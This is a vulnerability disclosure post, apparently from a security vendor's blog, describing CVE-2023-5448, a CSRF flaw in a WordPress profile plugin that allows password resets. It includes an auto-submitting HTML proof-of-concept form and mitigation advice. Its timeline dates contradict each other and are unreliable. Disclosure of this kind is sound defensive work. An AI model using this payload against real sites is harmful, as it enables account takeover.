A critical vulnerability has been uncovered during an examination of the WP Register Profile With Shortcode plugin. This flaw centers around a CSRF (Cross-Site Request Forgery) loophole specifically within the action=rpws_user_update_password functionality. This vulnerability allows an attacker to execute unauthorized password resets, posing an imminent threat to the security of user accounts, with the potential for even seizing control of administrator-level access in certain circumstances.
Main info:
| CVE | CVE-2023-5448 |
| Plugin | WP Register Profile With Shortcode <= 3.5.9 |
| Critical | Super High |
| All Time | 62 634 |
| Active installations | 1 000+ |
| Publicly Published | January 10, 2023 |
| Last Updated | January 10, 2023 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A2: Broken Authentication and Session Management |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5448 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-register-profile-with-shortcode/wp-register-profile-with-shortcode-359-cross-site-request-forgery-to-user-password-reset |
| Plugin Security Certification by CleanTalk |  |
Timeline
| October 6, 2023 | Plugin testing and vulnerability detection in the WP Register Profile With Shortcode have been completed |
| October 6, 2023 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| January 25, 2023 | The author fixed the vulnerability and released the plugin update |
| January 10, 2023 | Registered CVE-2023-5448 |
Discovery of the Vulnerability
In the process of testing the plugin, a CSRF vulnerability was found in action=rpws_user_update_password, which allows you to change the password to any user and in some saluchayah to seize the administrator account
Understanding of CSRF attack’s
Cross-Site Request Forgery is a type of web security vulnerability that enables an attacker to force users into performing actions they did not intend. In WordPress, CSRF could manifest as unauthorized actions carried out on behalf of a user who is tricked into clicking a malicious link or visiting a compromised website. Real-world examples might include an attacker manipulating a user’s account settings or initiating unauthorized actions using the user’s credentials.
Exploiting the CSRF Vulnerability
Exploiting this CSRF vulnerability involves tricking an authenticated user into unknowingly making a request to change their password. By leveraging the CSRF attack vector on the action=rpws_user_update_password endpoint, an attacker can surreptitiously modify a user’s password, potentially leading to a full account takeover. In certain scenarios, such an attack could escalate to compromising the credentials of high-privileged accounts, such as administrators.
POC html code:
<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”http://127.0.0.1/wordpress/?p=49″ method=”POST”>
<input type=”hidden” name=”option” value=”rpws_user_update_password” />
<input type=”hidden” name=”redirect” value=”http://127.0.0.1/wordpress/?p=49″ />
<input type=”hidden” name=”user_new_password” value=”pass” />
<input type=”hidden” name=”user_retype_password” value=”pass” />
<input type=”hidden” name=”profile” value=”Update” />
<input type=”submit” value=”Submit request” />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
___
The potential risks associated with this vulnerability are severe and multifaceted. In real-world scenarios, attackers could:
- Unauthorized Password Changes: Attackers can manipulate user accounts to change passwords without their consent.
- Account Takeover: In some instances, particularly with administrator accounts, this vulnerability could lead to a complete takeover of the affected account.
- Escalation of Privileges: If an attacker gains control of an administrator account, they could exploit elevated privileges to compromise the entire WordPress system.
This vulnerability not only jeopardizes the immediate security of the affected WordPress site but could also lead to broader consequences if the compromised data is used maliciously.
Recommendations for Improved Security
- Immediate Patching: Developers should release an urgent patch or update that addresses this specific CSRF vulnerability.
- User Education: Inform users about the potential risks of clicking on unfamiliar links and the importance of regularly changing passwords.
- Multi-Factor Authentication (MFA): Encourage or enforce the use of multi-factor authentication to add an additional layer of security.
- Security Audits: Conduct thorough security audits to identify and rectify any other potential vulnerabilities in the WordPress setup.
By implementing these measures, WordPress administrators can fortify their systems against CSRF attacks, ensuring the integrity and security of user accounts and the overall WordPress environment.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #SuperHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
